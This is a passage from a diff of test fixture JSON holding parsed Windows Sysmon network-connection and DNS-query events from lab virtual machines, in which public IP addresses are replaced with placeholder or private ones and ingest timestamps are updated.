Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.3\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -7837,7 +7752,7 @@ }, "destination": { "port": 443, - "ip": "40.77.226.250" + "ip": "89.160.20.156" }, "source": { "port": 1138, @@ -7846,7 +7761,7 @@ }, "network": { "protocol": "https", - "community_id": "1:W2ZbP8nXMY+YAGYw2h/3Sa8Gu/w=", + "community_id": "1:BPIgbA//CuXUCUo7V4pQn4uLQOk=", "transport": "tcp", "type": "ipv4", "direction": "egress" @@ -7861,13 +7776,13 @@ ], "ip": [ "10.0.2.15", - "40.77.226.250" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313835522Z", + "ingested": "2021-12-09T13:49:44.739462400Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -7917,7 +7832,7 @@ }, "destination": { "port": 443, - "ip": "40.77.226.250" + "ip": "89.160.20.156" }, "source": { "port": 1139, @@ -7926,7 +7841,7 @@ }, "network": { "protocol": "https", - "community_id": "1:5MsyqYltV9KkhIFGPWiByzQqHDo=", + "community_id": "1:FaLCJ8g6qTBdQh1Rvg2/ru25R6M=", "transport": "tcp", "type": "ipv4", "direction": "egress" @@ -7941,13 +7856,13 @@ ], "ip": [ "10.0.2.15", - "40.77.226.250" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313836822Z", + "ingested": "2021-12-09T13:49:44.739468300Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -8017,17 +7932,17 @@ "type": "CNAME" }, { - "data": "23.50.53.179", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.177", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.179", - "23.50.53.177" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -8044,14 +7959,13 @@ "ocsp.int-x3.letsencrypt.org" ], "ip": [ - "23.50.53.179", - "23.50.53.177" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313838096Z", + "ingested": "2021-12-09T13:49:44.739474100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.177;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -8115,11 +8029,11 @@ "type": "CNAME" }, { - "data": "172.217.12.195", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -8127,7 +8041,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -8135,7 +8049,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -8143,7 +8057,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -8151,21 +8065,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "172.217.12.195", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -8181,22 +8095,22 @@ "ocsp.pki.goog" ], "ip": [ - "172.217.12.195", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313839415Z", + "ingested": "2021-12-09T13:49:44.739480Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:172.217.12.195;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -8271,7 +8185,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313840767Z", + "ingested": "2021-12-09T13:49:44.739483800Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e12\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -8339,12 +8253,12 @@ "type": "CNAME" }, { - "data": "172.217.10.34", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "network": { @@ -8360,13 +8274,13 @@ "googleads4.g.doubleclick.net" ], "ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313842086Z", + "ingested": "2021-12-09T13:49:44.739488300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -8448,7 +8362,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313843519Z", + "ingested": "2021-12-09T13:49:44.739493400Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e13\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData 